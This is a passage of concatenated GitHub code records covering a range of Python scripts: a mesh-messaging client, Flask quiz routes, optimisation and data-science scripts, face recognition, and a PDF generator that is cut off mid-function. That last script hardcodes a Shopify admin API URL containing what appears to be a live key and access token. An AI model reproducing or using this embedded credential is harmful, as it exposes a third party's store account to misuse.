LXMF.LXMessage.DRAFT and self.lxm.state < LXMF.LXMessage.SENT:\n found = False\n for pending in nomadnet.NomadNetworkApp.get_shared_instance().message_router.pending_outbound:\n if pending.hash == self.lxm.hash:\n found = True\n\n if not found:\n self.lxm.state = LXMF.LXMessage.FAILED\n\n except Exception as e:\n RNS.log(\"Error while loading LXMF message \"+str(self.file_path)+\" from disk. The contained exception was: \"+str(e), RNS.LOG_ERROR)\n\n def unload(self):\n self.loaded = False\n self.lxm = None\n\n def purge(self):\n self.unload()\n if os.path.isfile(self.file_path):\n os.unlink(self.file_path)\n\n def get_timestamp(self):\n if not self.loaded:\n self.load()\n\n return self.timestamp\n\n def get_title(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.title_as_string()\n\n def get_content(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.content_as_string()\n\n def get_hash(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.hash\n\n def get_state(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.state\n\n def get_transport_encryption(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.transport_encryption\n\n def get_transport_encrypted(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.transport_encrypted\n\n def signature_validated(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.signature_validated\n\n def get_signature_description(self):\n if self.signature_validated():\n return \"Signature Verified\"\n else:\n if self.lxm.unverified_reason == LXMF.LXMessage.SOURCE_UNKNOWN:\n return \"Unknown Origin\"\n elif self.lxm.unverified_reason == LXMF.LXMessage.SIGNATURE_INVALID:\n return \"Invalid Signature\"\n else:\n return \"Unknown signature validation failure\"","repo_name":"markqvist/NomadNet","sub_path":"nomadnet/Conversation.py","file_name":"Conversation.py","file_ext":"py","file_size_in_byte":15306,"program_lang":"python","lang":"en","doc_type":"code","stars":337,"dataset":"github-code","pt":"53"} +{"seq_id":"18561660434","text":"from datetime import datetime\nfrom typing import Dict, List, Union\n\nfrom rootski.schemas import breakdown as schemas\nfrom rootski.services.database.dynamo.models.breakdown import Breakdown\nfrom rootski.services.database.dynamo.models.breakdown_item import BreakdownItem, NullBreakdownItem\nfrom rootski.services.database.dynamo.models.morpheme import Morpheme\n\n\ndef pydantic_to_dynamo__breakdown(\n user_breakdown: schemas.BreakdownUpsert,\n morpheme_data: Dict[str, Morpheme],\n user_email: str,\n word: str,\n is_admin: bool,\n) -> Breakdown:\n\n breakdown_items: List[Union[NullBreakdownItem, BreakdownItem]] = [\n pydantic_to_dynamo__breakdown_item(\n breakdown_item=breakdown_item,\n morpheme_data_objs=morpheme_data,\n user_email=user_email,\n word_id=user_breakdown.word_id,\n )\n for breakdown_item in user_breakdown.breakdown_items\n ]\n\n if is_admin:\n return Breakdown(\n word=word,\n word_id=user_breakdown.word_id,\n is_verified=True,\n is_inference=False,\n submitted_by_user_email=user_email,\n date_submitted=datetime.now(),\n date_verified=datetime.now(),\n breakdown_items=breakdown_items,\n )\n\n return Breakdown(\n word=word,\n word_id=user_breakdown.word_id,\n is_verified=False,\n is_inference=False,\n submitted_by_user_email=user_email,\n date_submitted=datetime.now(),\n date_verified=None,\n breakdown_items=breakdown_items,\n )\n\n\ndef pydantic_to_dynamo__breakdown_item(\n breakdown_item: Union[schemas.NullMorphemeBreakdownItem, schemas.MorphemeBreakdownItemInRequest],\n morpheme_data_objs: Dict[str, Morpheme],\n user_email: str,\n word_id: str,\n) -> Union[NullBreakdownItem, BreakdownItem]:\n DEPRECATED_BREAKDOWN_ID = -1\n\n if breakdown_item.morpheme_id is None:\n return NullBreakdownItem(\n word_id=word_id,\n position=breakdown_item.position,\n morpheme=breakdown_item.morpheme,\n submitted_by_user_email=user_email,\n )\n\n return BreakdownItem(\n word_id=word_id,\n position=breakdown_item.position,\n morpheme=morpheme_data_objs[str(breakdown_item.morpheme_id)].morpheme,\n morpheme_id=breakdown_item.morpheme_id,\n morpheme_family_id=morpheme_data_objs[str(breakdown_item.morpheme_id)].family_id,\n submitted_by_user_email=user_email,\n breakdown_id=DEPRECATED_BREAKDOWN_ID,\n )\n","repo_name":"rootski-io/rootski","sub_path":"rootski_api/src/rootski/services/database/dynamo/models2schemas/breakdown_schema_to_model.py","file_name":"breakdown_schema_to_model.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"9730193959","text":"# IMPORT PYTHON LIBRARY\nimport wntr \n\n# IMPORT EPANET WATER DISTRIBUTION NETWORKS (WDN)\ninp_file = 'G:/My Drive/Work Data/PT. Hutomo Bangun Perkasa/Hydroinformatics/Urban Modelling/WNTR/Net1.inp'\nwn = wntr.network.WaterNetworkModel(inp_file)\n\n# SIMULATE HYDRAULIC MODEL OF WDN\nsim = wntr.sim.EpanetSimulator(wn)\nresults = sim.run_sim() \n\n# GRAPH WATER DISTRIBUTION NETWORKS (WDN)\nwntr.graphics.plot_network(wn, title = 'Water Distribution Networks') \n\n# CASE: MINIMUM PRESSURE ALONG THE NETWORK IS 20 FEET. WE NEED TO CHANGE THE DIAMETER OF PIPE 10. \n\n# CHECK PRESSURE ALONG THE NETWORK\nP_Nodes = results.node['pressure']\nprint(P_Nodes)","repo_name":"axlhtm/Hydroinformatics","sub_path":"Urban Modelling/WNTR/Network 1 - Study Case.py","file_name":"Network 1 - Study Case.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42053987155","text":"from flask import (\n Response,\n render_template,\n Blueprint,\n flash,\n redirect,\n url_for,\n request,\n abort,\n)\nfrom flask_login import current_user, login_required\nfrom project.models import Questions, QuestionsAnswered, Mock\nfrom project import db\n\n\nmain = Blueprint(\"main\", __name__)\n\n\n@main.route(\"/\")\n@main.route(\"/home\")\ndef home():\n return render_template(\"main/home.html\", title=\"Home\")\n\n\n@main.route(\"/about\")\ndef about():\n return render_template(\"main/about.html\", title=\"About\")\n\n\n@main.route(\"/topics\")\n@login_required\ndef topics():\n sections = [\n x[0] for x in Questions.query.with_entities(Questions.Section).distinct().all()\n ]\n topics = {}\n for section in sections:\n topics[section] = [\n x[0]\n for x in Questions.query.with_entities(Questions.Topic)\n .filter_by(Section=section)\n .distinct()\n .all()\n ]\n return render_template(\"main/topics.html\", title=\"Topics\", topics=topics)\n\n\n@main.route(\"/questions//\")\n@login_required\ndef questions(section, topic):\n s, t = section.replace(\"_\", \" \"), topic.replace(\"_\", \" \")\n questions = Questions.query.filter_by(Section=s, Topic=t).all()\n answers = QuestionsAnswered.query.filter_by(UID=current_user.id).all()\n answers = {x.QID: (x.Option, x.Status) for x in answers}\n return render_template(\n \"main/questions.html\",\n title=t,\n questions=questions,\n count=1,\n len=len(questions),\n answers=answers,\n )\n\n\n@main.route(\"/save///\")\n@login_required\ndef save(qid, status, selection):\n uid = current_user.id\n\n data = QuestionsAnswered.query.filter_by(QID=qid, UID=uid).first()\n if data != None:\n data.Status = status\n data.Option = selection\n else:\n data = QuestionsAnswered(\n UID=current_user.id, QID=qid, Status=status, Option=selection\n )\n\n db.session.add(data)\n db.session.commit()\n return Response(status=204)\n\n\n@main.route(\"/mocktest\")\n@login_required\ndef mocktest():\n return render_template(\"main/mocktest.html\", title=\"Mock Test\")\n\n\n@main.route(\"/mocktest/\")\n@login_required\ndef mocktest_level(level):\n questions = (\n Questions.query.filter_by(Level=level) \n .order_by(db.func.random())\n .limit(10)\n .all()\n )\n return render_template(\n \"main/mocktest_questions.html\",\n title=f\"Mock Test - {level}\",\n questions=questions,\n count=1,\n len=len(questions),\n )\n\n\n@main.route(\"/mock///\")\n@login_required\ndef save_mocktest(level, score, time):\n data = Mock(UID=current_user.id, Level=level, Score=score, Time=time)\n db.session.add(data)\n db.session.commit()\n return Response(status=204)\n\n","repo_name":"faheempa/Projects","sub_path":"SkillSHARP_Aptitude_training_system/project/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17610807305","text":"import numpy as np\nimport pandas as pd\nimport sqlite3 as db\nfrom lsst.sims.utils import angularSeparation\nfrom astropy.coordinates import get_sun\nfrom astropy.time import Time\n\ndef convert_schema(filename, fileout):\n\n\n remap_dict ={'RA':'fieldRA', 'dec':'fieldDec', 'mjd':'observationStartMJD', 'exptime':'visitExposureTime', \n 'filter':'filter', 'rotSkyPos':'rotSkyPos', 'nexp':'numExposures',\n 'airmass':'airmass', 'FWHMeff':'seeingFwhmEff', 'FWHM_geometric':'seeingFwhmGeom',\n 'skybrightness':'skyBrightness', 'night': 'night', 'slewtime':'slewTime', 'fivesigmadepth':'fiveSigmaDepth',\n 'alt':'altitude', 'az':'azimuth', 'clouds':'clouds', 'moonAlt':'moonAlt', 'sunAlt':'sunAlt', 'note':'note', \n 'field_id':'fieldId', 'survey_id':'proposalId', 'block_id':'block_id'}\n\n\n conn = db.connect(filename)\n df = pd.read_sql('select * from observations;', conn)\n df = df.rename(index=str, columns=remap_dict)\n # Kludge on the visitTime\n df['visitTime'] = 2.*df['numExposures'].values + df['visitExposureTime'].values\n # Dummy column\n df['slewDistance'] = 0.*df['numExposures'].values\n\n # Add the solar elongation in there\n times = Time(df['observationStartMJD'].values, format='mjd')\n suns = get_sun(times)\n\n solarElong = angularSeparation(suns.ra.value, suns.dec.value, df['fieldRA'].values, df['fieldDec'].values)\n\n df['solarElong'] = solarElong\n\n conn.close()\n conn = db.connect(fileout)\n df.to_sql('SummaryAllProps', conn, index=False, if_exists='replace')\n\n\nif __name__ == '__main__':\n\n files = {'rolling/rolling_10yrs.db':'rolling/rolling_10yrs_opsim.db',\n 'roll_mix/rolling_mix_10yrs.db': 'roll_mix/rolling_mix_10yrs_opsim.db'}\n\n for infile in files:\n convert_schema(infile, files[infile])\n\n","repo_name":"yoachim/SLAIR_runs","sub_path":"runs/convert_schema.py","file_name":"convert_schema.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20282168186","text":"\"\"\"\nTest object detection for snooker/pool table and balls with Google's open images datasets\n\"\"\"\n\nimport fiftyone as fo\n\n\ndef pull_store_datasets(\n splits: list[str], pull_classes: list[str], export_classes: list[str]\n) -> None:\n \"\"\"\n Pulls and stores images from Google's open images api.\n\n :param splits: Splits of images to pull. [\"validation\", \"train\", \"test\"]\n :param pull_classes: List of class names that must be in the images.\n :param export_classes: List of class names that are in the exported images. Any other labels in the images will be\n ignored.\n\n :Examples:\n Pull all splits from open images with the class of Billiard Table\n >>> pull_store_datasets(\n >>> [\"validation\", \"train\", \"test\"], [\"Billiard table\"], [\"Ball\", \"Billiard table\"]\n >>> )\n \"\"\"\n for split in splits:\n print(f\"Pulling {split} dataset...\")\n dataset = fo.zoo.load_zoo_dataset(\n \"open-images-v6\",\n split=split,\n label_types=[\"detections\"],\n classes=pull_classes,\n )\n print(f\"Computing {split} dataset metadata...\")\n dataset.compute_metadata()\n # Not sure if this is needed\n # print(f\"Evaluating {split} dataset detections...\")\n # dataset.evaluate_detections(\n # \"predictions\",\n # gt_field=\"detections\",\n # method=\"open-images\",\n # classes=export_classes,\n # use_boxes=True,\n # )\n print(f\"Exporting {split} dataset...\")\n dataset.export(\n export_dir=\"datasets/snooker_vision\",\n dataset_type=fo.types.YOLOv5Dataset,\n split=split,\n classes=export_classes,\n )\n print(f\"{split} dataset complete.\")\n\n\ndef load_dataset(dataset_dir: str, name: str):\n \"\"\"\n Loads a dataset from disk. There are two ways to pull the dataset. If the dataset is in fo.list_datasets() then\n specify the name and use fo.load_dataset(). Else, specify the path, name and use fo.Dataset.from_dir().\n\n :param dataset_dir: Path to the dataset\n :param name: Name of the dataset\n \"\"\"\n return fo.Dataset.from_dir(\n dataset_dir=dataset_dir, dataset_type=fo.types.YOLOv5Dataset, name=name\n )\n # If the dataset is in fo.list_datasets(), then use this command to load dataset\n # return fo.load_dataset(name)\n\n\n# validation_data = load_dataset(\"datasets/snooker_vision/\", \"validation\")\n","repo_name":"morge2002/snooker-vision","sub_path":"object_detection_model/images/get_images.py","file_name":"get_images.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7177104199","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def invertTree(self, root: TreeNode) -> TreeNode:\n\n if(root == None):\n return\n else:\n self.invertTree(root.left)\n self.invertTree(root.right)\n\n temp = root.left\n root.left = root.right\n root.right = temp\n\n return root\n\n def InOrder(self,root):\n if root == None:\n return\n else:\n self.InOrder(root.left)\n print(root.val)\n self.InOrder(root.right)\n # return root\n\nif __name__ == '__main__':\n\n node=TreeNode(4)\n node.left = TreeNode(2)\n node.left.left = TreeNode(1)\n node.left.right = TreeNode(3)\n node.right = TreeNode(7)\n node.right.left = TreeNode(6)\n node.right.right = TreeNode(9)\n\n invertTreeSOl = Solution()\n invertTreeSOl.invertTree(node)\n invertTreeSOl.InOrder(node)","repo_name":"mmkvdev/leetcode","sub_path":"June/Week-1/Day1/Submissions/invertBinaryTree.py","file_name":"invertBinaryTree.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27987557564","text":"\"\"\" Utility to check if results have changed in foreign APIs. \"\"\"\n\nimport glob\nimport datetime\nfrom os.path import realpath, join, dirname, exists, expanduser\nimport hashlib\nimport pickle\n\nimport pandas as pd\nimport numpy as np\n\nfrom pliers.stimuli import load_stims\nfrom pliers.transformers import get_transformer\n\n\ndef hash_data(data, blocksize=65536):\n \"\"\"\" Hashes list of data, strings or data \"\"\"\n data = pickle.dumps(data)\n\n hasher = hashlib.sha1()\n hasher.update(data)\n\n return hasher.hexdigest()\n\n\ndef check_updates(transformers, datastore=None, stimuli=None):\n \"\"\" Run transformers through a battery of stimuli, and check if output has\n changed. Store results in csv file for comparison.\n\n Args:\n transformers (list): A list of tuples of transformer names and\n dictionary of parameters to instantiate with (or empty dict).\n datastore (str): Filepath of CSV file with results. Stored in home dir\n by default.\n stimuli (list): List of stimuli file paths to extract from. If None,\n use test data.\n \"\"\"\n # Find datastore file\n datastore = datastore or expanduser('~/.pliers_updates')\n prior_data = pd.read_csv(datastore) if exists(datastore) else None\n\n # Load stimuli\n stimuli = stimuli or glob.glob(\n join(dirname(realpath(__file__)), '../tests/data/image/CC0/*'))\n stimuli = load_stims(stimuli)\n\n # Get transformers\n loaded_transformers = {get_transformer(name, **params): (name, params)\n for name, params in transformers}\n\n # Transform stimuli\n results = pd.DataFrame({'time_extracted': [datetime.datetime.now()]})\n for trans in loaded_transformers.keys():\n for stim in stimuli:\n if trans._stim_matches_input_types(stim):\n res = trans.transform(stim)\n\n try: # Add iterable\n res = [getattr(res, '_data', res.data) for r in res]\n except TypeError:\n res = getattr(res, '_data', res.data)\n\n res = hash_data(res)\n\n results[\"{}.{}\".format(trans.__hash__(), stim.name)] = [res]\n\n # Check for mismatches\n mismatches = []\n if prior_data is not None:\n last = prior_data[\n prior_data.time_extracted == prior_data.time_extracted.max()]. \\\n iloc[0].drop('time_extracted')\n\n for label, value in results.iteritems():\n old = last.get(label)\n new = value.values[0]\n\n if old is not None:\n if isinstance(new, str):\n if new != old:\n mismatches.append(label)\n elif not np.isclose(old, new):\n mismatches.append(label)\n\n results = prior_data.append(results)\n\n results.to_csv(datastore, index=False)\n\n # Get corresponding transformer name and parameters\n def get_trans(hash_tr):\n for obj, attr in loaded_transformers.items():\n if str(obj.__hash__()) == hash_tr:\n return attr\n\n delta_t = {m.split('.')[0] for m in mismatches}\n delta_t = [get_trans(dt) for dt in delta_t]\n\n return {'transformers': delta_t, 'mismatches': mismatches}\n","repo_name":"PsychoinformaticsLab/pliers","sub_path":"pliers/utils/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"} +{"seq_id":"71915843368","text":"########\n# autora: danielle8farias@gmail.com \n# repositório: https://github.com/danielle8farias\n# Descrição: Programa retorna o status code de um site informado pelo usuário\n########\n\nimport requests\n\ndef ver_status_site(site):\n r = requests.get(site)\n return r.status_code\n\n\nif __name__ == '__main__':\n #chamadas da função\n print(ver_status_site('https://danielle8farias.github.io/'))\n print(ver_status_site('https://danielle8farias.github.io/blog/'))\n","repo_name":"danielle8farias-zz/hello-world-python3","sub_path":"exercicio_py/ex0034_http_status_codes/main_v0.py","file_name":"main_v0.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31923958298","text":"from gurobipy import *\n\ntry:\n center = ['plano', 'nashville', 'flagstaff', 'springfield', 'boulder']\n zone = ['la', 'chicago', 'columbus', 'atlanta', 'newark', 'kansas', 'denver', 'dallas']\n\n # data\n network, cost = multidict({\n ('plano', 'la'): 70,\n ('plano', 'chicago'): 47,\n ('plano', 'columbus'): 22,\n ('plano', 'atlanta'): 53,\n ('plano', 'newark'): 98,\n ('plano', 'kansas'): 21,\n ('plano', 'denver'): 27,\n ('plano', 'dallas'): 13,\n\n ('nashville', 'la'): 75,\n ('nashville', 'chicago'): 38,\n ('nashville', 'columbus'): 19,\n ('nashville', 'atlanta'): 58,\n ('nashville', 'newark'): 90,\n ('nashville', 'kansas'): 34,\n ('nashville', 'denver'): 40,\n ('nashville', 'dallas'): 26,\n\n ('flagstaff', 'la'): 15,\n ('flagstaff', 'chicago'): 78,\n ('flagstaff', 'columbus'): 37,\n ('flagstaff', 'atlanta'): 82,\n ('flagstaff', 'newark'): 111,\n ('flagstaff', 'kansas'): 40,\n ('flagstaff', 'denver'): 29,\n ('flagstaff', 'dallas'): 32,\n\n ('springfield', 'la'): 60,\n ('springfield', 'chicago'): 23,\n ('springfield', 'columbus'): 8,\n ('springfield', 'atlanta'): 39,\n ('springfield', 'newark'): 82,\n ('springfield', 'kansas'): 36,\n ('springfield', 'denver'): 32,\n ('springfield', 'dallas'): 45,\n\n ('boulder', 'la'): 45,\n ('boulder', 'chicago'): 40,\n ('boulder', 'columbus'): 29,\n ('boulder', 'atlanta'): 75,\n ('boulder', 'newark'): 86,\n ('boulder', 'kansas'): 25,\n ('boulder', 'denver'): 11,\n ('boulder', 'dallas'): 37,\n\n })\n\n m = Model('assignment')\n\n # Add variables\n x = m.addVars(network, name='network diagram')\n\n # center constraints\n center = m.addConstrs((x.sum(c, '*') <= 3 for c in center), 'center')\n\n # zone constraints\n zone = m.addConstrs((x.sum('*', z) == 1 for z in zone), 'zone')\n\n # Set objective function\n m.setObjective(x.prod(cost), GRB.MINIMIZE)\n\n # Solve model\n m.optimize()\n\n for v in m.getVars():\n print('%s %g' % (v.varName, v.x))\n\n for v in m.getVars():\n print('%s %g' % (v.varName, v.x))\n print(\"Final answer is in thousands\")\n\n print('obj: %g' % m.objVal)\n\n\n\nexcept Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(exc_type, fname, exc_tb.tb_lineno)\n","repo_name":"abhishekphadke/Optimization-using-Gurobi","sub_path":"Basic/03 Assignment problem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70042911210","text":"import click\nfrom nhs.searchengine import search\n\n\n@click.command()\n@click.argument('query')\n@click.argument('-operator', type=click.Choice(['AND', 'OR']), default='OR')\n@click.option('--datafile', default=\"./data/hscic-news\", type=click.File())\ndef cli(query, _operator, datafile=None):\n \"\"\"Will search the database.\n If operator is == OR (default) then entries must match at least one of the terms provided in the QUERY parameter.\n If operator is == OR then entries must match all of the terms provided in the QUERY parameter.\"\"\"\n\n # Formatting results\n results = ','.join(search(datafile, query, _operator))\n\n # returing results\n click.echo(results)\n\n\ndef main(): # pragma: no cover\n cli()\n","repo_name":"GigiusB/coding_test_1","sub_path":"src/nhs/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19405395074","text":"#! /usr/bin/python\n# **************************************************************************** #\n# __ #\n# rock_paper_scissors.py / _) #\n# _/\\/\\/\\_/ / #\n# By: pedro_mota _| / #\n# Github: github.com/peterbikes _| ( | ( | #\n# Linkedin: linkedin.com/in/pedrosmpm/ /__.-'|_|--|_| #\n# #\n# **************************************************************************** #\n\nimport random\nimport time\n\ndef lets_game(pc, player):\n print(\"🤜...rock...🤛\", end=\"\\r\")\n time.sleep(1)\n print(\"🤜...paper...🤛\", end=\"\\r\")\n time.sleep(1)\n print(\"🤜...scissors...🤛\", end = \"\\n\")\n time.sleep(1)\n if(pc == player):\n print(\"🪞 DRAW! 🪞\")\n if(pc == 'R' and player == 'P'):\n print(\"🧻 PLAYER WON! 🪨\")\n if(pc == 'R' and player == 'S'):\n print(\"✂️ COMPUTER WON :( 🪨\")\n if(pc == 'P' and player == 'R'):\n print(\"🪨 COMPUTER WON :( 🧻\")\n if(pc == 'P' and player == 'S'):\n print(\"✂️ PLAYER WON! 🧻\")\n if(pc == 'S' and player == 'P'):\n print(\"🧻 COMPUTER WON :( ✂️\")\n if(pc == 'S' and player == 'R'):\n print(\"🪨 PLAYER WON! ✂️\")\n\n\npc_choice = random.randint(1, 3)\nif(pc_choice == 1):\n pc_choice = 'R'\nif(pc_choice == 2):\n pc_choice = 'P'\nif(pc_choice == 3):\n pc_choice = 'S'\n\nwhile 1:\n player = input(\"(R)ock, (P)aper, (S)cissors? \")\n player = player.capitalize()\n if(player != 'R' and player != 'P' and player != 'S'):\n print(\"invalid choice, try again\")\n else:\n break\n\nlets_game(pc_choice, player)\n","repo_name":"peterbikes/100_Python_Projects","sub_path":"Rock Paper Scissors/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13882311176","text":"import numpy as np\nimport imutils\nimport pickle\nimport time\nimport cv2\n\nembeddingModel = \"openface_nn4.small2.v1.t7\"\n\nembeddingFile = \"output/embeddings.pickle\"\nrecognizerFile = \"output/recognizer.pickle\"\nlabelEncFile = \"output/le.pickle\"\nconf = 0.5\n\nprint(\"Loading face detector...\")\nprototxt = \"model/deploy.prototxt\"\nmodel = \"model/res10_300x300_ssd_iter_140000.caffemodel\"\ndetector = cv2.dnn.readNetFromCaffe(prototxt, model)\n\nprint(\"Loading face recognizer...\")\nembedder = cv2.dnn.readNetFromTorch(embeddingModel)\n\nrecognizer = pickle.loads(open(recognizerFile, \"rb\").read())\nle = pickle.loads(open(labelEncFile, \"rb\").read())\n\nbox = []\nprint(\"Starting video stream...\")\ncam = cv2.VideoCapture(0)\ntime.sleep(2.0)\n\nwhile True:\n _, frame = cam.read()\n frame = imutils.resize(frame, width=600)\n (h, w) = frame.shape[:2]\n imageBlob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0, (300, 300),(104.0, 177.0, 123.0), swapRB=False, crop=False)\n\n detector.setInput(imageBlob)\n detections = detector.forward()\n\n for i in range(0, detections.shape[2]):\n\n confidence = detections[0, 0, i, 2]\n\n if confidence > conf:\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n face = frame[startY:endY, startX:endX]\n (fH, fW) = face.shape[:2]\n\n if fW < 20 or fH < 20:\n continue\n\n faceBlob = cv2.dnn.blobFromImage(face, 1.0 / 255, (96, 96), (0, 0, 0), swapRB=True, crop=False)\n embedder.setInput(faceBlob)\n vec = embedder.forward()\n\n preds = recognizer.predict_proba(vec)[0]\n j = np.argmax(preds)\n proba = preds[j]\n name = le.classes_[j]\n text = \"{} : {:.2f}%\".format(name, proba * 100)\n y = startY - 10 if startY - 10 > 10 else startY + 10\n cv2.rectangle(frame, (startX, startY), (endX, endY),(0, 0, 255), 2)\n cv2.putText(frame, text, (startX, y),\n cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 255, 0), 2)\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n if key == 27:\n break\n\ncam.release()\ncv2.destroyAllWindows()","repo_name":"PGPradhan/Attendance-Project","sub_path":"4_recognizingPerson.py","file_name":"4_recognizingPerson.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6025719749","text":"\"\"\"\nIf a box contains twenty-one coloured discs, composed of fifteen blue discs and six red discs, and two discs were taken at random, it can be seen that the probability of taking two blue discs, P(BB) = (15/21)×(14/20) = 1/2.\n\nThe next such arrangement, for which there is exactly 50% chance of taking two blue discs at random, is a box containing eighty-five blue discs and thirty-five red discs.\n\nBy finding the first arrangement to contain over 1012 = 1,000,000,000,000 discs in total, determine the number of blue discs that the box would contain.\n\"\"\"\n\nimport timeit\n\nstart = timeit.default_timer()\n\n\n\"\"\"\nFrom OEIS A011900: Solutions to b(b-1) = 2a(a-1) in natural numbers\n\"\"\"\ndef a(n):\n if n == 0:\n return 1\n if n == 1:\n return 3\n\n return 6 * a(n-1) - a(n-2) - 2\n\nn = 2\n\nwhile True:\n if 2 * a(n) > 10**12:\n break\n n += 1\n\nprint(a(n))\n\nstop = timeit.default_timer()\nprint('Runtime:', stop - start)\n\n# Answer: 756872327473","repo_name":"tomlinsonk/euler","sub_path":"problem100/problem100.py","file_name":"problem100.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26309288085","text":"from reportlab.pdfgen import canvas\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nimport requests\nimport tkinter as tk\nfrom tkinter import *\nimport io\n\n# defining the gui\nroot = tk.Tk()\nroot.title('Custom Sports Sleeves')\nroot.geometry('700x700')\n\nurl = 'https://7e9f940f3dbb4372bc2c756d2617ab8d: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@lovcompression.myshopify.com/admin/api/2022-04/'\n\ndef get_date():\n get_date.date_1 = int(entry_date.get())\n get_date.orders = get_orders()\n\ndef get_orders():\n endpoint = f'orders.json?limit=250;created_at_max=2022-08-{get_date.date_1}T23:59:59;status=any'\n r = requests.get(url + endpoint)\n return r.json()\n\n\n# Importing Fonts\npdfmetrics.registerFont(TTFont('Marker', 'Bangers.ttf'))\npdfmetrics.registerFont(TTFont('Tough', 'BlackOpsOne-Regular.ttf'))\npdfmetrics.registerFont(TTFont('College', 'college.ttf'))\npdfmetrics.registerFont(TTFont('Iceberg', 'Iceberg.ttf'))\npdfmetrics.registerFont(TTFont('Roboto', 'Roboto-Bold.ttf'))\npdfmetrics.registerFont(TTFont('Jersey', 'sportsjersey.ttf'))\npdfmetrics.registerFont(TTFont('Asos', 'full_Pack_2025.ttf'))\npdfmetrics.registerFont(TTFont('Adventure', 'SF Fedora.ttf'))\npdfmetrics.registerFont(TTFont('Sporty', 'Calibri Bold.TTF'))\npdfmetrics.registerFont(TTFont('Burny', 'Burny.ttf'))\n\ndef namePDF(pdfName):\n namePDF.pdf = canvas.Canvas(pdfName + '.pdf')\n namePDF.numberEntries = 0\n namePDF.pdf.setPageSize((648,1286))\n\ndef headbandFontSize (txt, font1):\n txtLength = len(txt)\n print(txtLength)\n if font1 == 'Bangers':\n if txtLength <= 5:\n namePDF.pdf.setFont(font1, 190)\n namePDF.pdf.scale(1, 1)\n elif 5 < txtLength <= 8:\n namePDF.pdf.setFont(font1, 190)\n namePDF.pdf.scale(0.9, 1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 185)\n namePDF.pdf.scale(0.85, 1)\n elif font1 == 'Tough':\n if txtLength <= 5:\n namePDF.pdf.setFont(font1, 180)\n namePDF.pdf.scale(0.83, 1)\n elif 5 < txtLength <= 8:\n namePDF.pdf.setFont(font1, 185)\n namePDF.pdf.scale(0.6, 1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 170)\n namePDF.pdf.scale(0.5, 1)\n elif font1 == 'College':\n if txtLength <= 5:\n namePDF.pdf.setFont(font1, 185)\n namePDF.pdf.scale(1.1, 1)\n elif 5 < txtLength <= 8:\n namePDF.pdf.setFont(font1, 175)\n namePDF.pdf.scale(0.8, 1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 170)\n namePDF.pdf.scale(0.7, 1)\n elif font1 == 'Iceberg':\n if txtLength <= 5:\n namePDF.pdf.setFont(font1, 185)\n namePDF.pdf.scale(0.9, 1)\n elif 5 < txtLength <= 8:\n namePDF.pdf.setFont(font1, 175)\n namePDF.pdf.scale(0.7, 1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 175)\n namePDF.pdf.scale(0.5, 1)\n elif font1 == 'Roboto':\n if txtLength <= 5:\n namePDF.pdf.setFont(font1, 190)\n namePDF.pdf.scale(0.9, 1)\n elif 5 < txtLength <= 8:\n namePDF.pdf.setFont(font1, 180)\n namePDF.pdf.scale(0.7, 1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 175)\n namePDF.pdf.scale(0.55, 1)\n elif font1 == 'Sports Jersey':\n if txtLength <= 5:\n namePDF.pdf.setFont(font1, 185)\n namePDF.pdf.scale(1.1, 1)\n elif 5 < 